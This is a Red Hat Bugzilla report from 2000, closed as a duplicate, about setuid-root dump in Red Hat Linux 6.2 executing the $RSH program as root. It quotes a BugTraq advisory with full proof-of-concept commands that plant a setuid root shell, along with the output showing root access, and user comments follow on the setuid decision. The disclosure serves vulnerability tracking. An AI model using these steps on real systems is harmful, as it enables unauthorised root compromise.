Bug 20112 - dump executes $RSH with root privs
dump executes $RSH with root privs
Status: CLOSED DUPLICATE of bug 20111
Product: Red Hat Linux
Classification: Retired
Component: dump (Show other bugs)
6.2
All Linux
high Severity medium
: ---
: ---
Assigned To: Preston Brown
Dale Lovelace
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-10-31 12:53 EST by Daniel Roesen
Modified: 2007-03-26 23:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-10-31 13:30:14 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Daniel Roesen 2000-10-31 12:53:38 EST
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Redhat 6.2 dump command executes external program with suid
         priviledge.
Date: Tue, 31 Oct 2000 14:37:35 +0900

1. Problem:
 Linux dump command executes external program with suid priviledge.
2. Tested Version
 dump-0.4b15
3. Example
 [mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
 [mat@localhost mat]$ ls -la /home/mat/sh
 -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
 [mat@localhost mat]$ /home/mat/sh
 bash# id
 uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
=================================================
|                                               |
|               mat@hacksware.com               |
|                                               |
=================================================
Comment 1 Daniel Roesen 2000-10-31 13:02:06 EST
WTF is dump on RH <7 setuid root anyway? RH7 dump is chmod 755 as it should be.
Comment 2 Daniel Roesen 2000-10-31 13:30:11 EST
And another question: as Red Hat decided to remove the suid bit on RH7 
(obviously because of security concerns), why didn't we see a security errata 
update for RH 6.x at the time this decision was made? Do all vulnerabilites 
have to get exploited and/or posted to BugTraq before actions get taken?

Admitted, I'm "a little bit" pissed right now.
Comment 3 Daniel Roesen 2000-10-31 15:56:32 EST
Closing this report as duplicate... phr@doc.ic.ac.uk was a minute faster than 
me :-]

*** This bug has been marked as a duplicate of 20111 ***

Note You need to log in before you can comment on or make changes to this bug.